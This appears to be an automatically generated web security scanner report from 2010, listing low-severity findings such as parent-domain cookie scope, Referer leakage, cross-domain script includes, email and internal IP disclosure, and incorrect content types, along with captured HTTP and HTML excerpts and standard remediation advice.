HTTP/1.1 302 Found Date: Mon, 15 Nov 2010 04:27:09 GMT Server: Omniture DC/2.0.0 Set-Cookie: s_vi=[CS]v1|26705B4E85010E89-400001068000283F[CE]; Expires=Sat, 14 Nov 2015 04:27:09 GMT; Domain=fisherinvestments.112.2o7.net; Path=/ Location: http://fisherinvestments.112.2o7.net/b/ss/finvfisherinvestmentscom/1/H.7-pdv-2/s58622881630435?AQB=1&pccr=true&vidn=26705B4E85010E89-400001068000283F&&ndh=1&t=14/10/2010%2022%3A25%3A38%200%20360&ns=fisherinvestments&pageName=Home&g=http%3A//www.fi.com/&r=http%3A//fi.com/&cc=USD&ch=Home&s=1920x1200&c=16&j=1.3&v=Y&k=Y&bw=1525&bh=904&p=Google%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.210.7%3BJava%28TM%29%20Platform%20SE%206%20U21%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 X-C: ms-4.3 Expires: Sun, 14 Nov 2010 04:27:09 GMT Last-Modified: Tue, 16 Nov 2010 04:27:09 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www52 Content-Length: 0 Content-Type: text/plain
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Issue background
A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.
Issue remediation
By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.
If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.
You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.
Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.
Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.
Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
<!-- SiteCatalyst code version: H.6. Copyright 1997-2006 Omniture, Inc. More info available at http://www.omniture.com --> ...[SNIP]... <!-- Advertiser 'Fisher Investments', Include user in segment 'Fisher Remarketing Pixel' - DO NOT MODIFY THIS PIXEL IN ANY WAY --> <img src="http://ad.yieldmanager.com/pixel?id=105668&t=2" width="1" height="1" border="0"> <br /> ...[SNIP]... </script> <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"> </script> ...[SNIP]... <div style="display:inline;"> <img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1066305854/?label=pFeACMaEsAEQvpK6_AM&guid=ON&script=0"/> </div> ...[SNIP]...
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.
If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.
Issue remediation
Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Onsite Backup Software for Network based Disk to Disk Backup for SMBs and RO ...[SNIP]... </form> <script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en&sitesearch=true"></script> ...[SNIP]... </div> <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=anparasu"></script> ...[SNIP]... </script> <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"> </script> ...[SNIP]... <!--VISISTAT SNIPPET//--> <script type="text/javascript" src="http://analytics.aweber.com/js/awt_analytics.js?id=8Lqu"></script> ...[SNIP]...
The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.
However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.
Issue remediation
You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 06:26:24 GMT Server: Apache Last-Modified: Mon, 01 Nov 2010 20:31:09 GMT ETag: "8cd2b-2180-49403b0363d40" Accept-Ranges: bytes Vary: Accept-Encoding,User-Agent Content-Type: application/x-javascript Content-Length: 8576
/** * jquery.slideShow (1.0.2) * by Marcel Eichner (www.marceleichner.de) * <love@ephigenia.de> * * This simple slideshow plugin will provide your effect gallery with * some simple features:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Onsite Backup Software for Network based Disk to Disk Backup for SMBs and RO ...[SNIP]... <input value="noreply@vembu.com" name="from-email" type="hidden"> ...[SNIP]...
The following RFC 1918 IP address was disclosed in the response:
10.207.110.10
Issue background
RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.
Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.
Issue remediation
There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.
If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.
In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.
<br /> <b>Warning</b>: include(../secure/constants.php) [<a href='function.include'>function.include</a>]: failed to open stream: Permission denied in <b>/home/vembuweb/web/style/style.css.php</b> on ...[SNIP]...
Report generated by Hoyt LLC at Mon Nov 15 12:04:33 CST 2010.